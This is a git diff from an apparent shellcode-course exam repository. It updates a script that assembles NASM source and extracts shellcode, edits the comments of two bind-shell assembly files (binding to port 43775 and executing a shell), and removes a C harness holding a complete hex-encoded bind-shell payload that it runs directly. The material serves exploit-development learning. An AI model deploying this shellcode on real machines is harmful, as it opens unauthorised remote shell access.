diff --git a/exam1/compile_all.sh b/exam1/compile_all.sh index d1e70dd..7435e73 100755 --- a/exam1/compile_all.sh +++ b/exam1/compile_all.sh @@ -1,6 +1,6 @@ #!/usr/bin/env sh # -# Create shellcode with specific port +# Creates shell_bind_tcp shellcode with specific port # # Example # ./compile_all.sh shell_bind_tcp 50123 @@ -14,6 +14,7 @@ ARG1=$1 # Specify program ARG2=$2 # Specify port + # # Check script usage and file existence # @@ -21,16 +22,22 @@ if [ -z "$ARG1" ]; then echo " [I] Please specify program you would like to assemble!" echo " [I] Usage example: ./compile_all.sh shell_bind_tcp 50123" exit 1; -elif ! [ -e "$ARG1".nasm ]; then +elif [ -e "$ARG1" ]; then + if [[ $ARG1 == *nasm* ]]; then + ARG1=$(echo -ne $ARG1 |sed 's/.....$//g'); + echo $ARG1 + fi +elif [ ! -e "$ARG1".nasm ]; then ARG1_GUESS=$(echo $ARG1 |sed 's/.nasm//g') if [ -e "$ARG1_GUESS" ]; then ARG1=$ARG1_GUESS else - echo " [E] File "$ARG1".nasm does not exist!" + echo " [E] File "$ARG1" does not exist!" exit 1; fi fi + # # Validate nasm source file # @@ -54,9 +61,9 @@ fi # # Assemble and link # -echo " [+] Assembling "$1".nasm with NASM ..." +echo " [+] Assembling "$ARG1".nasm with NASM ..." nasm -f elf32 -o $ARG1.o $ARG1.nasm && \ -echo " [+] Linking "$1".o ..." && \ +echo " [+] Linking "$ARG1".o ..." && \ ld -m elf_i386 -o $ARG1 $ARG1.o && \ echo -e " [+] Generating shellcode with objdump ..." && \ SHELLCODE=$(objdump -d ./$ARG1 |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/' |sed 's/$/"/g') diff --git a/exam1/shell_bind_tcp.nasm b/exam1/shell_bind_tcp.nasm index ca6e805..c9233a8 100644 --- a/exam1/shell_bind_tcp.nasm +++ b/exam1/shell_bind_tcp.nasm @@ -16,8 +16,8 @@ ; 2013 March ; ; DESC: -; Binds to a port 43775 -; Execs Shell on incoming connection +; - Binds to a port 43775 +; - Execs Shell on incoming connection ; ; ; Shellcode size: 141 bytes diff --git a/exam1/shell_bind_tcp_smaller.nasm b/exam1/shell_bind_tcp_smaller.nasm index fea2a07..4a4b73e 100644 --- a/exam1/shell_bind_tcp_smaller.nasm +++ b/exam1/shell_bind_tcp_smaller.nasm @@ -16,8 +16,8 @@ ; 2013 March ; ; DESC: -; Binds to a port 43775 -; Execs Shell on incoming connection +; - Binds to a port 43775 +; - Execs Shell on incoming connection ; ; ; Shellcode size: 108 bytes diff --git a/exam1/shellcode.c b/exam1/shellcode.c deleted file mode 100644 index dbc7a19..0000000 --- a/exam1/shellcode.c +++ /dev/null @@ -1,11 +0,0 @@ -#include -#include - -unsigned char code[] = "\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x6d\x5f\x31\xc0\xb0\x66\x31\xdb\xb3\x02\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x31\xd2\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc0\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\xe8\x8e\xff\xff\xff\xaa\xff"; - -main() -{ - printf("Shellcode Length: %d\n", strlen(code)); - int (*ret)() = (int(*)())code; - ret(); -}